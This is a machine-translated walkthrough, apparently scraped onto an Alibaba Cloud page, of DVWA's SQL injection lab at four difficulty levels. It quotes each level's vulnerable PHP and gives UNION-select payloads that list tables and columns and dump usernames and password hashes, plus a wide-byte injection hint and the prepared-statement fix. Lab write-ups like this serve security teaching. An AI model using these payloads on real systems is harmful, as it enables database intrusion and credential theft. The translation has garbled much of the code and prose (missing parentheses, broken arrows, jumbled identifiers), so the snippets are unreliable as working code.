"DVWA" "SQL Injection" SQL injection low Medium high impossible

Source: Internet
Author: User
Tags mysql client php source code

1. low.php of primary articles

First look at the source code, the parameters obtained directly into the SQL statement execution

if isset $_request [' Submit ' ])) {    //  Get input    $id $_request [' ID ' ];     // Check Database    $query  = "Select First_Name, last_name from users WHERE user_id = '$id';";

http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&submit=Submit#

Direct quotation of the newspaper is wrong, through the error message is easy to use single quotation marks to close

http://localhost/DVWA-master/vulnerabilities/sqli/?id=1 '&submit=Submit#
inch Check  to  for  Right  to  Use "' 1 " " At line 1

Use order by to guess the number of fields

http://localhost/DVWA-master/vulnerabilities/sqli/?id=1 ' ORDER by 3%23&submit=Submit #

Order by 2 o'clock page Normal

Union select query User () database ()

Http://localhost/DVWA-master/vulnerabilities/sqli/?id=1 ' Union Select User (), database ()%23& Submit=Submit#

Check the table name

Http://localhost/DVWA-master/vulnerabilities/sqli/?id=0 ' union SELECT 1,GROUP_CONCAT (table_name) from Information_schema.tables where table_schema= ' Dvwa '%23&submit=Submit#

Check the Users table column name

Http://localhost/DVWA-master/vulnerabilities/sqli/?id=0 ' union select 1,GROUP_CONCAT (column_name) from Information_schema.columns where table_schema= ' Dvwa ' and table_name= ' users '%23&submit=Submit #

Check data

Http://localhost/DVWA-master/vulnerabilities/sqli/?id=0 ' union select User,password from Dvwa.users limit 0,1%23  &submit=Submit#

Decryption is available.

2. Intermediate article medium.php

To see the difference, the ID parameter is no longer used by $_request, and the mysql_real_escape_string () function is used to escape the special characters in the string used in the SQL statement.

if(isset($_post[' Submit ' ] ) ) {    //Get Input    $id=$_post[' ID ' ]; $id=mysqli_real_escape_string($GLOBALS["___mysqli_ston"],$id); $query= "Select First_Name, last_name from users WHERE user_id =$id;"; $result=Mysqli_query($GLOBALS["___mysqli_ston"],$query) or die(' <pre> '.Mysqli_error($GLOBALS["___mysqli_ston"]) . ' </pre> ');

The most direct effect is ' escaped as ', which makes it impossible for an attacker to close the quotes and not inject them.

If the MySQL client is encoded as GBK, a wide-byte injection is generated. Refer to Http://netsecurity.51cto.com/art/201404/435074.htm using https://www.cnblogs.com/superkrissV/p/8379690.html

If the ID parameter is integral type, because no closing quotation marks are required, the same can be injected normally, where the ID is an integer type

SELECT  from WHERE user_id = $id;

Use Hackbar plugin to submit post data, post form # do not encode into%23

Id=0 Union Select 1,2#&submit=Submit

Take the data as you would a primary article

Id=0 Union Select User,password from dvwa.users limit 0,1#&submit=Submit

3. Advanced Article high.php

The ID parameter is obtained from the session, because the session data is stored on the server side, many programmers will check the data from the client, and the data on the service side is considered secure

if(isset($_session[' ID ' ] ) ) {    //Get Input    $id=$_session[' ID ' ]; //Check Database    $query= "Select First_Name, last_name from users WHERE user_id = '$id' LIMIT 1; '; $result=Mysqli_query($GLOBALS["___mysqli_ston"],$query) or die(' <pre>something went wrong.</pre> ');

Click to pop up a page with the corresponding URL

http://localhost/DVWA-master/vulnerabilities/sqli/session-input.php

Review the source code

View session-input.php source code, you can find that the ID parameter has not been processed directly to the session

if isset $_post [' ID ' ])) {    $_session[' id '] =  $_post [' ID ' ];     // $page [' body ']. = "Session ID set!<br/><br/><br/>";    $page [' body ']. = "Session ID: {$_session[' id ']}<br/><br/><br/>";     $page [' body ']. = "<script>window.opener.location.reload (true);</script>";}

Understand these can be injected, injected page is session-input.php, display the results of the page is index.php

http://localhost/DVWA-master/vulnerabilities/sqli/session-input.php

Post Submission

Id=0 ' union select User,password from dvwa.users#&submit=Submit

Refresh

http://localhost/DVWA-master/vulnerabilities/sqli/index.php

4. Impossible article impossible.php

Viewing the source code, you can find the use of PDO technology to prevent SQL injection, bind ID to int

    $id=$_get[' ID ' ]; //Was a number entered?    if(Is_numeric($id )) {        //Check the database        $data=$db->prepare (' SELECT first_name, last_name from users WHERE user_id = (: id) LIMIT 1; ' ); $data->bindparam (': Id ',$idPdo::param_int); $data-execute (); $row=$data->fetch ();

"DVWA" "SQL Injection" SQL injection low Medium high impossible

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.